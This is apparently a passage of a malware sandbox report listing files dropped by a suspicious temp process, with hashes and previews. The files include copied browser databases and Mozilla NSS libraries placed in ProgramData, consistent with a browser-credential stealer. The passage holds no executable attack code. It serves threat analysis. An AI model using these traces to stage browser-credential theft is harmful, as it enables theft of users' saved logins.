                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\DHDHCG-shm

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.017262956703125623
                                                                      Encrypted:false
                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                      Malicious:false
                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\DHIEHI

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):9571
                                                                      Entropy (8bit):5.536643647658967
                                                                      Encrypted:false
                                                                      SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                      MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                      SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                      SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                      SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                      Malicious:false
                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                      C:\ProgramData\FIEGCBKEGCFC\FIIEHJ

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                      Category:dropped
                                                                      Size (bytes):28672
                                                                      Entropy (8bit):2.5793180405395284
                                                                      Encrypted:false
                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\IDBAFH

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):114688
                                                                      Entropy (8bit):0.9746603542602881
                                                                      Encrypted:false
                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\JKEGHD

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                      Category:dropped
                                                                      Size (bytes):126976
                                                                      Entropy (8bit):0.47147045728725767
                                                                      Encrypted:false
                                                                      SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                      MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                      SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                      SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                      SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\KEGCBF

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                      Category:dropped
                                                                      Size (bytes):159744
                                                                      Entropy (8bit):0.7873599747470391
                                                                      Encrypted:false
                                                                      SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                      MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                      SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                      SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                      SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\freebl3.dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):685392
                                                                      Entropy (8bit):6.872871740790978
                                                                      Encrypted:false
                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: 4.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: CHA0VZiz8y.exe, Detection: malicious, Browse
                                                                      • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                                                      • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\mozglue.dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):608080
                                                                      Entropy (8bit):6.833616094889818
                                                                      Encrypted:false
                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Joe Sandbox View:
                                                                      • Filename: 4.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: CHA0VZiz8y.exe, Detection: malicious, Browse
                                                                      • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                                                      • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\msvcp140.dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):450024
                                                                      Entropy (8bit):6.673992339875127
                                                                      Encrypted:false
                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\nss3.dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):2046288
                                                                      Entropy (8bit):6.787733948558952
                                                                      Encrypted:false
                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\softokn3.dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):257872
                                                                      Entropy (8bit):6.727482641240852
                                                                      Encrypted:false
                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\FIEGCBKEGCFC\vcruntime140.dll

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):80880
                                                                      Entropy (8bit):6.920480786566406
                                                                      Encrypted:false
                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_38F9.exe_9760284121905b7cc7fc96d1e94df0d47c5f1575_d1f02302_561e1d39-5d97-4da1-9982-57118b66ff65\Report.wer

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):0.9894148562813556
                                                                      Encrypted:false
                                                                      SSDEEP:96:cOUN23s5hqnF77qnIfqBQXIDcQ1c6OXcEScw31+HbHg/8BRTf32rLOyKZzTvSEPw:LUN23P0M0rc42jvPFPzuiFvZ24IO8d
                                                                      MD5:F930DA38A64DB3E1B2AE7C9D3C30883B
                                                                      SHA1:2A57F6634DE422C0DC979F0A43C04E0FADCE1A87
                                                                      SHA-256:B08F5C517F6DF0CDE4C3959984337ACA0820E3E1498DB678B1921EEB771A3921
                                                                      SHA-512:663662C79C3BD85B3895943C2D1C96369FCFC7C9F5CC37C42C2DEDC8D08C8D1E47207CB165E74527F30AE3AB78C94AC4D3500594CBA5887AA9B9DEF617AF3A58
                                                                      Malicious:false
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.1.8.5.7.3.0.9.6.8.5.3.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.1.8.5.7.3.1.5.1.5.4.0.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.1.e.1.d.3.9.-.5.d.9.7.-.4.d.a.1.-.9.9.8.2.-.5.7.1.1.8.b.6.6.f.f.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.b.8.d.8.1.2.-.e.0.1.c.-.4.c.0.a.-.9.d.a.c.-.c.d.1.8.9.5.c.7.c.c.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.8.F.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.c.-.0.0.0.1.-.0.0.1.4.-.b.0.0.4.-.f.7.a.e.4.6.a.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.f.b.a.c.2.7.1.3.5.b.b.8.d.9.3.8.a.1.8.0.b.7.5.8.d.3.2.d.6.f.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.e.8.9.a.f.e.b.6.1.c.1.d.0.8.5.2.4.1.2.4.8.0.e.e.2.0.2.d.4.8.c.7.d.5.a.c.e.b.!.3.8.F.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.5.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER936D.tmp.dmp

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Sun May 26 08:28:51 2024, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):53306
                                                                      Entropy (8bit):2.8301116927306795
                                                                      Encrypted:false
                                                                      SSDEEP:384:Lhb1utDjqtTBV7MO1fVEHhhW4PJMEk4AsXdywU0m:Fbw8TBBF1fVEHhhW4PJVk4AlN
                                                                      MD5:2AC248AF70CDC67BE122E85AAEFD0A15
                                                                      SHA1:FF8A450DA0B91CBF6768AA2D8EE88C619F5005C0
                                                                      SHA-256:4AE1CD299D77E4E4B3B539093BE1BB0B8E9286897A3F9D4EEF96FE339E9174BA
                                                                      SHA-512:33010A2027BD0DE39D178F6EC700AFF5303AD64DEDE8D954F0C915F141F0167AAF76D5900FA94BC8ED53AD9F6F5C5CD46C8B42CCF0428CAFF51F4421C0F73586
                                                                      Malicious:false
                                                                      Preview:MDMP..a..... .........Rf............4...............H........................1..........`.......8...........T............>..Z...........x ..........d"..............................................................................eJ......."......GenuineIntel............T.............Rf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9459.tmp.WERInternalMetadata.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8288
                                                                      Entropy (8bit):3.6929038849859905
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJif6U06Y9QSU42gmfvmkpDr89bh7sfwIrm:R6lXJC6n6YKSU42gmfvShAfwJ
                                                                      MD5:AB8D15F32143A4130AEBC8C08A099C39
                                                                      SHA1:40895F56B32BCA6B452508D3A44AC7AF7D45B5E7
                                                                      SHA-256:C1910CEF3A54AB3D455CBD4A1EE1233750E0BF8F79054FA81DE2E37F3674DAA7
                                                                      SHA-512:75DB4F7B8162A940835024C0326727C1BDC2241D09003237B1B0D7C8B2C9BC671964CB968AD6494E5774BEF2C06B21515742095452614FD9F7B7EF9484AEB08C
                                                                      Malicious:false
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.3.2.<./.P.i.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9488.tmp.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4537
                                                                      Entropy (8bit):4.431263543442402
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zsHjJg77aI9qFWpW8VY4Ym8M4JDjFvgRR+q8Ow7ikTmcvAd:uIjfdI7I07VwJSRRQ7ikTHvAd
                                                                      MD5:B334B2DEA127BC8AC44AE65E8E0900DE
                                                                      SHA1:F3B8ADFCF78975D78797DB52F77BDEA3FC232FC7
                                                                      SHA-256:8AD299B84E3E0364B3321D38E6952B0CB580646E49EC423B46400B4A8AB697DA
                                                                      SHA-512:F62829FCC9C6FE8EDEC4C269AF316344E70B2BC9E43BB2F20EDFDF5D28FE40B7B3F218C5BDAA33862CA17735BEC1543B23051D84EAD3F35D5B4803FC0D4C672F
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="339811" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199689717899[1].htm

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):35682
                                                                      Entropy (8bit):5.380946092123569
                                                                      Encrypted:false
                                                                      SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SO:s78LtWYmwt5D0gqOac7PzzgiJmDzJtxq
                                                                      MD5:D3DAEDA56D6BB3BEB2BAB639C7F2C6B9
                                                                      SHA1:8FA33E43538BB31DCAA0093971BCF4E6808DDD41
                                                                      SHA-256:5C5C4C1633AB4FA0DADD61118C07072FDA362DB210F03D122964D38E2A0518B5
                                                                      SHA-512:F45FC3968C66C4C6F1AE37D882EFBF666A2925811BC8CDFA0AAE13449D0C8876C2F91BD3FF91790411DB60AC32AF6E6F34F232BD98D07EF8DFAC63CB7E88B896
                                                                      Malicious:false
